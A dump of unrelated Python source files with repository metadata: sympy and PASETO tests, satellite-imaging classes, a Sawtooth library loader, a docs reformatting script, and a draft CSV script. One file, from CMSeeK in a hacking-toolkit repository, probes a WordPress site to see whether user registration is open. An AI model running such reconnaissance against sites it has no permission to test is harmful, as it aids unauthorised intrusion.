assert parsed
def test_key_gen():
symmetric = ProtocolVersion3.generate_symmetric_key()
secret = ProtocolVersion3.generate_asymmetric_secret_key()
assert isinstance(symmetric, SymmetricKey)
assert isinstance(secret, AsymmetricSecretKey)
assert isinstance(secret.get_public_key(), AsymmetricPublicKey)
assert ProtocolVersion3.symmetric_key_byte_length == len(symmetric.key)
assert len(secret.key) >= 48
# TODO: support importing secret key from this format
asymmmetric2 = AsymmetricSecretKey(
key_material=b"\x7f" + secrets.token_bytes(47), protocol=ProtocolVersion3
)
pk = asymmmetric2.get_public_key()
assert isinstance(pk, AsymmetricPublicKey)
| 30.973684
| 81
| 0.754036
|
4a14708c9a73ab01c7eec76c86020f282291a299
| 829
|
py
|
Python
|
.modules/.CMSeeK/deepscans/wp/check_reg.py
|
termux-one/EasY_HaCk
|
0a8d09ca4b126b027b6842e02fa0c29d8250e090
|
[
"Apache-2.0"
] | 1,103
|
2018-04-20T14:08:11.000Z
|
2022-03-29T06:22:43.000Z
|
.modules/.CMSeeK/deepscans/wp/check_reg.py
|
sshourya948/EasY_HaCk
|
0a8d09ca4b126b027b6842e02fa0c29d8250e090
|
[
"Apache-2.0"
] | 29
|
2019-04-03T14:52:38.000Z
|
2022-03-24T12:33:05.000Z
|
.modules/.CMSeeK/deepscans/wp/check_reg.py
|
sshourya948/EasY_HaCk
|
0a8d09ca4b126b027b6842e02fa0c29d8250e090
|
[
"Apache-2.0"
] | 161
|
2018-04-20T15:57:12.000Z
|
2022-03-15T19:16:16.000Z
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# This is a part of CMSeeK, check the LICENSE file for more information
# Copyright (c) 2018 Tuhinshubhra
# http://localhost/wordpress/wordpress/wp-login.php?action=register
import cmseekdb.basic as cmseek
def start(url,ua):
reg_url = url + '/wp-login.php?action=register'
cmseek.info('Checking user registration status')
reg_source = cmseek.getsource(reg_url, ua)
reg_status = '0'
if reg_source[0] == '1' and '<form' in reg_source[1]:
if 'Registration confirmation will be emailed to you' in reg_source[1] or 'value="Register"' in reg_source[1] or 'id="user_email"' in reg_source[1]:
cmseek.success('User registration open: ' + cmseek.bold + cmseek.fgreen + reg_url + cmseek.cln)
reg_status = '1'
return [reg_status, reg_url]
| 41.45
| 156
| 0.687575
|
4a14718f86d9db27691df2df57b61ece403bcd72
| 3,257
|
py
|
Python
|
pygaarst/ali.py
|
chryss/pygaarst
|
6e91180d063e4289cf2ea7a0261b231030e37dae
|
[
"MIT"
] | 42
|
2015-02-25T21:39:23.000Z
|
2021-11-22T04:48:34.000Z
|
pygaarst/ali.py
|
chryss/pygaarst
|
6e91180d063e4289cf2ea7a0261b231030e37dae
|
[
"MIT"
] | 12
|
2015-04-20T19:09:17.000Z
|
2017-07-21T21:38:43.000Z
|
pygaarst/ali.py
|
chryss/pygaarst
|
6e91180d063e4289cf2ea7a0261b231030e37dae
|
[
"MIT"
] | 15
|
2015-04-03T19:16:14.000Z
|
2022-03-28T11:32:36.000Z
|
# coding: utf-8
"""
**pygaarst.ali**
**ALI-specific classes.**
*Refactored out of pygaarst.raster by Chris Waigl on 2014-11-14.*
"""
from __future__ import division, print_function, absolute_import
from builtins import str
from builtins import range
import os.path
import logging
import pygaarst.irutils as ir
from pygaarst.rasterhelpers import PygaarstRasterError
from pygaarst.usgsl1 import USGSL1scene, USGSL1band, _validate_platformorigin
logging.basicConfig(level=logging.DEBUG)
LOGGER = logging.getLogger('pygaarst.ali')
class ALIscene(USGSL1scene):
"""
A container object for EO-1 ALI scenes. Input: directory name,
which is expected to contain all scene files.
"""
def __init__(self, dirname):
super(ALIscene, self).__init__(dirname)
self.permissiblebandid = [str(num) for num in range(1, 11)]
_validate_platformorigin('ALI', self.spacecraft, self.sensor)
def __getattr__(self, bandname):
"""
Override _gettattr__() for bandnames of the form bandN with N in the
bands permissible for Ali.
(See https://eo1.usgs.gov/sensors/hyperioncoverage).
Warn if band is non-calibrated.
Allows for infixing the filename just before the .TIF extension for
pre-processed bands.
"""
# see https://eo1.usgs.gov/sensors/hyperioncoverage
isband = False
head, _, tail = bandname.lower().partition('band')
try:
band = tail.upper()
if head == '':
if band in self.permissiblebandid:
isband = True
else:
raise PygaarstRasterError(
"EO-1 ALI does not have a band %s. " +
"Permissible band labels are between 1 and 10.")
except ValueError:
pass
if isband:
# Note: Landsat 7 has low and high gain bands 6,
# with different label names
keyname = "BAND%s_FILE_NAME" % band
bandfn = self.meta['PRODUCT_METADATA'][keyname]
base, ext = os.path.splitext(bandfn)
postprocessfn = base + self.infix + ext
bandpath = os.path.join(self.dirname, postprocessfn)
self.bands[band] = ALIband(bandpath, band=band, scene=self)
return self.bands[band]
return object.__getattribute__(self, bandname)
class ALIband(USGSL1band):
"""
Represents a band of an EO-1 ALI scene.
"""
def __init__(self, filepath, band=None, scene=None):
super(ALIband, self).__init__(filepath, band=band, scene=scene)
_validate_platformorigin('ALI', self.spacecraft, self.sensor)
@property
def radiance(self):
"""Radiance in W / um / m^2 / sr derived from digital number
and metadata, as numpy array"""
if not self.meta:
raise PygaarstRasterError(
"Impossible to retrieve metadata for band. " +
"No radiance calculation possible.")
self.gain = self.meta[
'RADIANCE_SCALING']['BAND%s_SCALING_FACTOR' % self.band]
self.bias = self.meta['RADIANCE_SCALING']['BAND%s_OFFSET' % self.band]
return ir.dn2rad(self.data, self.gain, self.bias)
| 35.402174
| 78
| 0.628185
|
4a14726429f1bad904f3af76d440017a292ce8ac
| 6,080
|
py
|
Python
|
sympy/physics/quantum/tests/test_state.py
|
ethankward/sympy
|
44664d9f625a1c68bc492006cfe1012cb0b49ee4
|
[
"BSD-3-Clause"
] | 1
|
2021-06-22T23:27:55.000Z
|
2021-06-22T23:27:55.000Z
|
sympy/physics/quantum/tests/test_state.py
|
ethankward/sympy
|
44664d9f625a1c68bc492006cfe1012cb0b49ee4
|
[
"BSD-3-Clause"
] | null | null | null |
sympy/physics/quantum/tests/test_state.py
|
ethankward/sympy
|
44664d9f625a1c68bc492006cfe1012cb0b49ee4
|
[
"BSD-3-Clause"
] | 1
|
2020-02-06T17:54:20.000Z
|
2020-02-06T17:54:20.000Z
|
from sympy import (Add, conjugate, diff, I, Integer, Mul, oo, pi, Pow,
Rational, sin, sqrt, Symbol, symbols, sympify, S)
from sympy.testing.pytest import raises
from sympy.physics.quantum.dagger import Dagger
from sympy.physics.quantum.qexpr import QExpr
from sympy.physics.quantum.state import (
Ket, Bra, TimeDepKet, TimeDepBra,
KetBase, BraBase, StateBase, Wavefunction
)
from sympy.physics.quantum.hilbert import HilbertSpace
x, y, t = symbols('x,y,t')
class CustomKet(Ket):
@classmethod
def default_args(self):
return ("test",)
class CustomKetMultipleLabels(Ket):
@classmethod
def default_args(self):
return ("r", "theta", "phi")
class CustomTimeDepKet(TimeDepKet):
@classmethod
def default_args(self):
return ("test", "t")
class CustomTimeDepKetMultipleLabels(TimeDepKet):
@classmethod
def default_args(self):
return ("r", "theta", "phi", "t")
def test_ket():
k = Ket('0')
assert isinstance(k, Ket)
assert isinstance(k, KetBase)
assert isinstance(k, StateBase)
assert isinstance(k, QExpr)
assert k.label == (Symbol('0'),)
assert k.hilbert_space == HilbertSpace()
assert k.is_commutative is False
# Make sure this doesn't get converted to the number pi.
k = Ket('pi')
assert k.label == (Symbol('pi'),)
k = Ket(x, y)
assert k.label == (x, y)
assert k.hilbert_space == HilbertSpace()
assert k.is_commutative is False
assert k.dual_class() == Bra
assert k.dual == Bra(x, y)
assert k.subs(x, y) == Ket(y, y)
k = CustomKet()
assert k == CustomKet("test")
k = CustomKetMultipleLabels()
assert k == CustomKetMultipleLabels("r", "theta", "phi")
assert Ket() == Ket('psi')
def test_bra():
b = Bra('0')
assert isinstance(b, Bra)
assert isinstance(b, BraBase)
assert isinstance(b, StateBase)
assert isinstance(b, QExpr)
assert b.label == (Symbol('0'),)
assert b.hilbert_space == HilbertSpace()
assert b.is_commutative is False
# Make sure this doesn't get converted to the number pi.
b = Bra('pi')
assert b.label == (Symbol('pi'),)
b = Bra(x, y)
assert b.label == (x, y)
assert b.hilbert_space == HilbertSpace()
assert b.is_commutative is False
assert b.dual_class() == Ket
assert b.dual == Ket(x, y)
assert b.subs(x, y) == Bra(y, y)
assert Bra() == Bra('psi')
def test_ops():
k0 = Ket(0)
k1 = Ket(1)
k = 2*I*k0 - (x/sqrt(2))*k1
assert k == Add(Mul(2, I, k0),
Mul(Rational(-1, 2), x, Pow(2, S.Half), k1))
def test_time_dep_ket():
k = TimeDepKet(0, t)
assert isinstance(k, TimeDepKet)
assert isinstance(k, KetBase)
assert isinstance(k, StateBase)
assert isinstance(k, QExpr)
assert k.label == (Integer(0),)
assert k.args == (Integer(0), t)
assert k.time == t
assert k.dual_class() == TimeDepBra
assert k.dual == TimeDepBra(0, t)
assert k.subs(t, 2) == TimeDepKet(0, 2)
k = TimeDepKet(x, 0.5)
assert k.label == (x,)
assert k.args == (x, sympify(0.5))
k = CustomTimeDepKet()
assert k.label == (Symbol("test"),)
assert k.time == Symbol("t")
assert k == CustomTimeDepKet("test", "t")
k = CustomTimeDepKetMultipleLabels()
assert k.label == (Symbol("r"), Symbol("theta"), Symbol("phi"))
assert k.time == Symbol("t")
assert k == CustomTimeDepKetMultipleLabels("r", "theta", "phi", "t")
assert TimeDepKet() == TimeDepKet("psi", "t")
def test_time_dep_bra():
b = TimeDepBra(0, t)
assert isinstance(b, TimeDepBra)
assert isinstance(b, BraBase)
assert isinstance(b, StateBase)
assert isinstance(b, QExpr)
assert b.label == (Integer(0),)
assert b.args == (Integer(0), t)
assert b.time == t
assert b.dual_class() == TimeDepKet
assert b.dual == TimeDepKet(0, t)
k = TimeDepBra(x, 0.5)
assert k.label == (x,)
assert k.args == (x, sympify(0.5))
assert TimeDepBra() == TimeDepBra("psi", "t")
def test_bra_ket_dagger():
x = symbols('x', complex=True)
k = Ket('k')
b = Bra('b')
assert Dagger(k) == Bra('k')
assert Dagger(b) == Ket('b')
assert Dagger(k).is_commutative is False
k2 = Ket('k2')
e = 2*I*k + x*k2
assert Dagger(e) == conjugate(x)*Dagger(k2) - 2*I*Dagger(k)
def test_wavefunction():
x, y = symbols('x y', real=True)
L = symbols('L', positive=True)
n = symbols('n', integer=True, positive=True)
f = Wavefunction(x**2, x)
p = f.prob()
lims = f.limits
assert f.is_normalized is False
assert f.norm is oo
assert f(10) == 100
assert p(10) == 10000
assert lims[x] == (-oo, oo)
assert diff(f, x) == Wavefunction(2*x, x)
raises(NotImplementedError, lambda: f.normalize())
assert conjugate(f) == Wavefunction(conjugate(f.expr), x)
assert conjugate(f) == Dagger(f)
g = Wavefunction(x**2*y + y**2*x, (x, 0, 1), (y, 0, 2))
lims_g = g.limits
assert lims_g[x] == (0, 1)
assert lims_g[y] == (0, 2)
assert g.is_normalized is False
assert g.norm == sqrt(42)/3
assert g(2, 4) == 0
assert g(1, 1) == 2
assert diff(diff(g, x), y) == Wavefunction(2*x + 2*y, (x, 0, 1), (y, 0, 2))
assert conjugate(g) == Wavefunction(conjugate(g.expr), *g.args[1:])
assert conjugate(g) == Dagger(g)
h = Wavefunction(sqrt(5)*x**2, (x, 0, 1))
assert h.is_normalized is True
assert h.normalize() == h
assert conjugate(h) == Wavefunction(conjugate(h.expr), (x, 0, 1))
assert conjugate(h) == Dagger(h)
piab = Wavefunction(sin(n*pi*x/L), (x, 0, L))
assert piab.norm == sqrt(L/2)
assert piab(L + 1) == 0
assert piab(0.5) == sin(0.5*n*pi/L)
assert piab(0.5, n=1, L=1) == sin(0.5*pi)
assert piab.normalize() == \
Wavefunction(sqrt(2)/sqrt(L)*sin(n*pi*x/L), (x, 0, L))
assert conjugate(piab) == Wavefunction(conjugate(piab.expr), (x, 0, L))
assert conjugate(piab) == Dagger(piab)
k = Wavefunction(x**2, 'x')
assert type(k.variables[0]) == Symbol
| 26.550218
| 79
| 0.604112
|
4a147289f460c0edcb26bee4a7afa4c9da070b8f
| 115
|
py
|
Python
|
flask_admin_tablefield/__init__.py
|
cllen/flask-admin-tablefield
|
f9e6c758e0c8545b4b60e24a4e3d4669c60481ee
|
[
"MIT"
] | null | null | null |
flask_admin_tablefield/__init__.py
|
cllen/flask-admin-tablefield
|
f9e6c758e0c8545b4b60e24a4e3d4669c60481ee
|
[
"MIT"
] | null | null | null |
flask_admin_tablefield/__init__.py
|
cllen/flask-admin-tablefield
|
f9e6c758e0c8545b4b60e24a4e3d4669c60481ee
|
[
"MIT"
] | null | null | null |
from .tablefield import TableField
from .tablecheckboxfield import TableCheckBoxField
__version__ = '0.2.2022.3.7'
| 28.75
| 50
| 0.826087
|
4a1472afb730bac4aff94a5bb912b3dd26e85e7c
| 2,192
|
py
|
Python
|
validator/sawtooth_validator/ffi.py
|
PrantikMullick/sawtooth-core
|
00255c4ca834a3240c38f235cf28d3c23cad015e
|
[
"Apache-2.0"
] | null | null | null |
validator/sawtooth_validator/ffi.py
|
PrantikMullick/sawtooth-core
|
00255c4ca834a3240c38f235cf28d3c23cad015e
|
[
"Apache-2.0"
] | null | null | null |
validator/sawtooth_validator/ffi.py
|
PrantikMullick/sawtooth-core
|
00255c4ca834a3240c38f235cf28d3c23cad015e
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
import ctypes
import logging
import os
import sys
LOGGER = logging.getLogger(__name__)
class Library:
def __init__(self):
lib_prefix_mapping = {
"darwin": "lib",
"linux": "lib",
"linux2": "lib",
}
lib_suffix_mapping = {
"darwin": ".dylib",
"linux": ".so",
"linux2": ".so",
}
os_name = sys.platform
lib_location = os.environ.get('SAWTOOTH_LIB_HOME', '')
if lib_location and lib_location[-1:] != '/':
lib_location += '/'
try:
lib_prefix = lib_prefix_mapping[os_name]
lib_suffix = lib_suffix_mapping[os_name]
except KeyError:
raise OSError("OS isn't supported: {}".format(os_name))
library_path = "{}{}sawtooth_validator{}".format(
lib_location, lib_prefix, lib_suffix)
LOGGER.debug("loading library %s", library_path)
self._cdll = ctypes.CDLL(library_path)
def call(self, name, *args):
return getattr(self._cdll, name)(*args)
LIBRARY = Library()
def prepare_byte_result():
"""Returns pair of byte pointer and size value for use as return parameters
in a LIBRARY call
"""
return (ctypes.POINTER(ctypes.c_uint8)(), ctypes.c_size_t(0))
def from_c_bytes(c_data, c_data_len):
"""Takes a byte pointer and a length and converts it into a python bytes
value.
"""
# pylint: disable=invalid-slice-index
return bytes(c_data[:c_data_len.value])
| 28.102564
| 80
| 0.619069
|
4a1473e651d956328399dc319a4bb6b90976c075
| 1,388
|
py
|
Python
|
model-optimizer/mo/front/kaldi/extractors/memoryoffset_ext_test.py
|
zhoub/dldt
|
e42c01cf6e1d3aefa55e2c5df91f1054daddc575
|
[
"Apache-2.0"
] | 3
|
2020-02-09T23:25:37.000Z
|
2021-01-19T09:44:12.000Z
|
model-optimizer/mo/front/kaldi/extractors/memoryoffset_ext_test.py
|
zhoub/dldt
|
e42c01cf6e1d3aefa55e2c5df91f1054daddc575
|
[
"Apache-2.0"
] | null | null | null |
model-optimizer/mo/front/kaldi/extractors/memoryoffset_ext_test.py
|
zhoub/dldt
|
e42c01cf6e1d3aefa55e2c5df91f1054daddc575
|
[
"Apache-2.0"
] | 2
|
2020-04-18T16:24:39.000Z
|
2021-01-19T09:42:19.000Z
|
"""
Copyright (c) 2019 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from mo.front.kaldi.extractors.common_ext_test import KaldiFrontExtractorTest
from mo.front.kaldi.extractors.memoryoffset_ext import MemoryOffsetFrontExtractor
from mo.ops.memoryoffset import MemoryOffset
from mo.ops.op import Op
class MemoryOffsetFrontExtractorTest(KaldiFrontExtractorTest):
@classmethod
def register_op(cls):
Op.registered_ops['memoryoffset'] = MemoryOffset
@classmethod
def create_pb_for_test_node(cls):
pb = {'pair_name': 'my_pair',
't': -5,
'has_default': False
}
cls.test_node['parameters'] = pb
def test_extract(self):
MemoryOffsetFrontExtractor.extract(self.test_node)
self.assertEqual(self.test_node['pair_name'], 'my_pair')
self.assertEqual(self.test_node['t'], -5)
| 35.589744
| 81
| 0.729827
|
4a1474974787730bfa6958adab4cc74866563f6b
| 5,516
|
py
|
Python
|
scripts/reformat.py
|
TheChronicMonster/docs
|
02415d0c0ba428e35af86afa39f7cb6b0114e09d
|
[
"MIT"
] | 92
|
2020-05-20T15:25:39.000Z
|
2022-03-27T23:38:36.000Z
|
scripts/reformat.py
|
TheChronicMonster/docs
|
02415d0c0ba428e35af86afa39f7cb6b0114e09d
|
[
"MIT"
] | 266
|
2020-05-19T23:26:02.000Z
|
2022-03-30T14:03:51.000Z
|
scripts/reformat.py
|
TheChronicMonster/docs
|
02415d0c0ba428e35af86afa39f7cb6b0114e09d
|
[
"MIT"
] | 185
|
2020-05-19T22:46:57.000Z
|
2022-03-30T13:33:38.000Z
|
#!/usr/bin/env python3
# rm -rf goal && mkdir goal && goal generate-docs goal && ./reformat.py -path goal
import argparse
import os
import os.path
import pprint
import re
import shutil
import sys
import tempfile
from pathlib import Path
pp = pprint.PrettyPrinter(indent=4)
parser = argparse.ArgumentParser(description='Reformat markdown files to display in mkdocs.')
parser.add_argument('-doc-dir', required=True, help='Path to document directory.')
parser.add_argument('-cmd', required=False, help='Full path to command. If provided the doc-dir will be emptied and new markdown files will be generated with \'cmd generate-docs <doc-dir>\'')
def process_markdown_file(new_file, original_name, goal_depth, with_subcommand):
""" Update markdown links to use relative paths in different directories. """
with tempfile.NamedTemporaryFile(mode='w', dir='.', delete=False) as tmp, \
open(new_file, 'r') as f:
title=original_name.split('.')[0].replace('_', ' ')
tmp.write("title: %s\n---\n" % title)
for line in f:
result = line
m = re.search('(^\* \[.*\]\()(.*)(\).*$)', result)
# Most lines wont match, write them unmodified
if m != None:
# Grab the command, i.e. 'goal' in 'goal.md', or 'delete' in 'goal_account_multisig_delete.md'
# Find out how many levels away the link is (siblings need ../, parents need ../../)
link_parts = m.group(2).split('.')[0].split('_')
subcommand = link_parts[-1]
prefix_mul = goal_depth - link_parts.index(subcommand) + 2
# Subcommands have an extra level of nesting
if subcommand in with_subcommand:
link = '../'*prefix_mul + ((subcommand + '/')*2)
else:
link = '../'*prefix_mul + subcommand + '/'
result = "%s%s%s" % (m.group(1), link, m.group(3))
# Remove the auto generated line.
if 'Auto generated by spf13/cobra on' in line:
result = ""
tmp.write(result + "\n")
os.replace(tmp.name, new_file)
def process(dirpath):
""" move files into a directory structure and add .pages files. """
with_subcommand = []
moved_files = []
files = os.listdir(dirpath)
for f in files:
parts = f.split('_')
new_name=parts.pop()
root_path='/'.join(parts)
# If this is a "root" file, append one more directory.
# For example "goal_account.md" is a root because of commands like "goal_account_new.md"
root_check = parts.copy()
root_check.append(re.sub('\.md', '', new_name))
extended_path = '_'.join(root_check) + '_'
is_root = any(extended_path in s for s in files)
if is_root:
with_subcommand.append(root_check[-1])
parts=root_check
root_path='/'.join(parts)
try:
os.makedirs(dirpath + '/' + root_path)
except FileExistsError:
pass # this is expected to happen.
new_file = dirpath + '/' + root_path + '/' + new_name
os.rename(dirpath + '/' + f, new_file)
moved_files.append((new_file, len(parts)-1, f))
# Make sure root file is displayed first in the navigation par
if is_root:
with open(dirpath + '/' + root_path + '/.pages', 'w') as f:
f.write('title: %s\n' % ' '.join(parts))
f.write('arrange:\n - %s' % new_name)
# Fix the links at the very end so that we know which ones have subcommands
for f,depth,original_name in moved_files:
process_markdown_file(f, original_name, depth, with_subcommand)
return len(moved_files)
def fix_root(num_files_modified, path):
"""
The algorithm puts everything one directory too deep, move it up.
"""
files=[f for f in os.listdir(path) if os.path.isfile(os.path.join(path, f))]
directories=[f for f in os.listdir(path) if os.path.isdir(os.path.join(path, f))]
if num_files_modified == 1 and len(files) == 1:
p=Path(path)
pp.pprint(p)
shutil.move(os.path.join(path, files[0]), os.path.join(Path(path).parents[0], files[0]))
shutil.rmtree(path)
return
if len(files) != 0:
print("WRONG NUMBER OF FILES IN ROOT PATH: %d" % len(files))
return
if len(directories) != 1:
print("WRONG NUMBER OF DIRECTORIES IN ROOT PATH: %d" % len(directories))
return
extra_dir = path + '/' + directories[0]
shutil.move(extra_dir, path + '.tmp')
os.rmdir(path)
shutil.move(path + '.tmp', path)
if __name__ == "__main__":
args = parser.parse_args()
if os.sep != '/':
print("Wont work on this system.")
sys.exit(1)
if not os.path.isdir(args.doc_dir):
os.makedirs(args.doc_dir)
# Don't break if a trailing slash is provided.
if args.doc_dir[-1] == '/':
args.doc_dir = args.doc_dir[:-1]
# Check if we should regenerate the markdown files
if args.cmd != None:
print("Deleting directory: %s" % args.doc_dir)
shutil.rmtree(args.doc_dir)
os.makedirs(args.doc_dir)
os.system('%s generate-docs %s' % (args.cmd, args.doc_dir))
num_files_modified = process(args.doc_dir)
# No need to fix_root if there are subcommands.
fix_root(num_files_modified, args.doc_dir)
print("Finished formatting %d files." % num_files_modified)
| 38.84507
| 191
| 0.601523
|
4a1475cdf1747ddcd4d11e9a7b4a7b9d6a845995
| 541
|
py
|
Python
|
manage.py
|
MenheraMikumo/Mnemosyne
|
d606458c2ad8059ce6cc50cea532c3abff0589f4
|
[
"MIT"
] | null | null | null |
manage.py
|
MenheraMikumo/Mnemosyne
|
d606458c2ad8059ce6cc50cea532c3abff0589f4
|
[
"MIT"
] | null | null | null |
manage.py
|
MenheraMikumo/Mnemosyne
|
d606458c2ad8059ce6cc50cea532c3abff0589f4
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "Mnemosyne.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| 33.8125
| 73
| 0.687616
|
4a1476717cbc6ed089929118e5a474bfa9e82671
| 1,797
|
py
|
Python
|
.history/postImages/index_20201006210614.py
|
Lambda-School-Labs/Labs27-C-Bridges-To-Prosperity-BE
|
9a8289d8550115362c46dea3ed8570b789c09a10
|
[
"MIT"
] | 2
|
2020-10-21T22:14:15.000Z
|
2020-10-21T22:14:16.000Z
|
.history/postImages/index_20201006210614.py
|
Lambda-School-Labs/Labs27-C-Bridges-To-Prosperity-BE
|
9a8289d8550115362c46dea3ed8570b789c09a10
|
[
"MIT"
] | null | null | null |
.history/postImages/index_20201006210614.py
|
Lambda-School-Labs/Labs27-C-Bridges-To-Prosperity-BE
|
9a8289d8550115362c46dea3ed8570b789c09a10
|
[
"MIT"
] | null | null | null |
import csv
import requests
df = open("bridgeData3.csv",'r').readlines()
fin = open('final.csv','r').readlines()
finCsv = fin[1:]
# url = https://b2ptc.herokuapp.com/bridges
finalCsv = df[1:]
obj = {}
for i in finalCsv:
x = i.split(',')
obj[x[1]] = {'bridge_name':x[0],'proj_code':x[1],'before_img':x[2],'after_img':x[3][0:-1]}
finalObj = {}
for i in finCsv:
x = i.split(',')
finalObj[x[6]]= {}
if x[6] in obj:
finalObj[x[6]]['province'] = x[0]
finalObj[x[6]]['district'] = x[1]
finalObj[x[6]]['sector'] = x[2]
finalObj[x[6]]['cell'] = x[3]
finalObj[x[6]]['bridge_site'] = x[4]
finalObj[x[6]]['stage'] = x[5]
finalObj[x[6]]['id'] = int(x[6])
finalObj[x[6]]['type'] = x[7]
finalObj[x[6]]['latt'] = float(x[8])
finalObj[x[6]]['long'] = float(x[9])
try:
serv = float(x[10])
except:
serv = x[10]
sv = x[13].split(' ')[2]
finalObj[x[6]]['served'] = serv
finalObj[x[6]]['community_served'] = x[14]
try:
pId = int(x[15])
except :
pId = x[15]
finalObj[x[6]]['provId'] = pId
finalObj[x[6]]['districtId'] = int(x[16])
finalObj[x[6]]['sectorId'] = int(x[17])
finalObj[x[6]]['cellId'] = int(x[18][0:-1])
print(f'this is df{df[0]}')
break
else:
print(fin[0])
for key in finalObj:
print(key)
# for i in finalCsv:
# x = i.split(',')
# requests.put(url+x[0],data={before:x[2],after:x[3]})
# pull each id,before image and after from df
# for each data item do a put request with the id as the param id
# and then put the before and after image in an dict and place it as the data for the put request
| 29.95
| 97
| 0.513634
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.